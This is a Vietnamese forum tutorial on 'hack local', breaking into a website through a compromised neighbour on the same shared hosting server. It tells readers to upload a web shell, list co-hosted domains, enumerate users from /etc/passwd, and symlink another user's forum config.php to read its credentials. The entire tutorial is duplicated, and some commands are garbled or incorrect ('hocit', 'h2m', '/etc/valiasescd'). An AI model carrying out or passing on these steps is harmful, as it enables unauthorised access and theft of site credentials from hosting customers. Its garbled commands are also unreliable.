Đầu tiên mình nói qua qua về hacklocal tức là hack 1 website nào đó có dùng host chạy chung 1 server.
Ví dụ: Các muốn hack 1 sitenào đó ae fai check xem nó nằm ở server nào, và những web nào có cùng chạy trên server đó… Sau đó khai thác các site cùng server đó xem site nào lỗi để mình có thể thực hiện được ý đồ ở đây là upload đc công cụ hack của mình lên.
Nếu có host cùng sever với bọn nó thì càng tốt, up con shell lên host của mình để local sang.
Dưới đây là 1 số lệnh khi sử dụng shell:
Tìm path của mấy đứa Add on domain
Mã:
find /usr/local/apache/logs/-name 'error_log' | xargs grep -E 'victim.com'
Xem tên domain trên cùng 1host:
Mã:
ls -la /etc/valiasescd /etc/vdomainaliases;ls -lia
Trường hợp đặc biệt khi không thể xem user nằm cùng host thì ta thêm && vào:
Mã:
cd /etc/vdomainaliases && ls -lia
Muốn biết tên user thì xài lệnh này:
Mã:
hocit /etc/passwd/less /etc/passwd
Local sang victim:
VD con shell mình là:
Mã:
/home/abcd/public_html/
Thì mình sẽ local sang như sau:
Mã:
dir home/tên user cần local/public_html
Xem nội dung của file:
Mã:
h2m /home/tên user cần local/public_html/index.php
Ví dụ mình muốn xem configcủa 1 forum thì dùng:
Mã:
ln -s /home/tên user cần local/public_html/forum/includes/config.php abc.txt
abc.txt ở đây là file bạn tạora trênhost của bạn để xemfile của ngườikhác !
Nếu bạn sử dụng ko được các lệnhtrên tức là server đã disable chức năng đó. Sẽupdate thêm.
Thêm 1 số lệnh shell trong linux:
- pwd: đưa ra ngoài màn hình thư mục đang hoạt động (Ex: /etc/ssh).
- cd: thay đổi thư mục (Ex: cd news – vào thư mục /news).
- ls: đưa ra danh sách nội dung thưmục.
- mkdir: tạo thư mục mới (mkdir ten_thumuc).
- touch: tạo file mới (touch ten_file).
- rmdir: bỏ một thư mục (rmdir ten_thumuc).
- cp: copy file hoặc thư mục (cp file_nguồn file_đích).
- rm: loại bỏ file (rm tên_file).
- mv: di chuyển file hoặc thư mục; cũng được dùng để đặt lại tên file hoặc thư mục (mv vị_trí_cũ vị_trí_mới hoặc mv tên_cũ tên_mới).
Để tìm kiếm file, bạn có thể dùng:
- find : dùng cho các tên file.
- grep < tiêu chuẩn tìm kiếm>: để tìm nội dung trong file.
Để xem một file, bạn có thểdùng:
- more : hiển thị file theo từng trang.
h2m < tên file>: hiển thị tất cả file
Ví dụ: Các muốn hack 1 sitenào đó ae fai check xem nó nằm ở server nào, và những web nào có cùng chạy trên server đó… Sau đó khai thác các site cùng server đó xem site nào lỗi để mình có thể thực hiện được ý đồ ở đây là upload đc công cụ hack của mình lên.
Nếu có host cùng sever với bọn nó thì càng tốt, up con shell lên host của mình để local sang.
Dưới đây là 1 số lệnh khi sử dụng shell:
Tìm path của mấy đứa Add on domain
Mã:
find /usr/local/apache/logs/-name 'error_log' | xargs grep -E 'victim.com'
Xem tên domain trên cùng 1host:
Mã:
ls -la /etc/valiasescd /etc/vdomainaliases;ls -lia
Trường hợp đặc biệt khi không thể xem user nằm cùng host thì ta thêm && vào:
Mã:
cd /etc/vdomainaliases && ls -lia
Muốn biết tên user thì xài lệnh này:
Mã:
hocit /etc/passwd/less /etc/passwd
Local sang victim:
VD con shell mình là:
Mã:
/home/abcd/public_html/
Thì mình sẽ local sang như sau:
Mã:
dir home/tên user cần local/public_html
Xem nội dung của file:
Mã:
h2m /home/tên user cần local/public_html/index.php
Ví dụ mình muốn xem configcủa 1 forum thì dùng:
Mã:
ln -s /home/tên user cần local/public_html/forum/includes/config.php abc.txt
abc.txt ở đây là file bạn tạora trênhost của bạn để xemfile của ngườikhác !
Nếu bạn sử dụng ko được các lệnhtrên tức là server đã disable chức năng đó. Sẽupdate thêm.
Thêm 1 số lệnh shell trong linux:
- pwd: đưa ra ngoài màn hình thư mục đang hoạt động (Ex: /etc/ssh).
- cd: thay đổi thư mục (Ex: cd news – vào thư mục /news).
- ls: đưa ra danh sách nội dung thưmục.
- mkdir: tạo thư mục mới (mkdir ten_thumuc).
- touch: tạo file mới (touch ten_file).
- rmdir: bỏ một thư mục (rmdir ten_thumuc).
- cp: copy file hoặc thư mục (cp file_nguồn file_đích).
- rm: loại bỏ file (rm tên_file).
- mv: di chuyển file hoặc thư mục; cũng được dùng để đặt lại tên file hoặc thư mục (mv vị_trí_cũ vị_trí_mới hoặc mv tên_cũ tên_mới).
Để tìm kiếm file, bạn có thể dùng:
- find : dùng cho các tên file.
- grep < tiêu chuẩn tìm kiếm>: để tìm nội dung trong file.
Để xem một file, bạn có thểdùng:
- more : hiển thị file theo từng trang.
h2m < tên file>: hiển thị tất cả file
![[cXF] Icons in More options menu](/data/resource_icons/0/432.jpg?1730710877){kind=icon}
![Arabic Language Pack [vBulletin 6.0.0]](/data/resource_icons/0/431.jpg?1728563962){kind=icon}
![[cXF] Sticky Postbit](/data/resource_icons/0/429.jpg?1728039111){kind=icon}
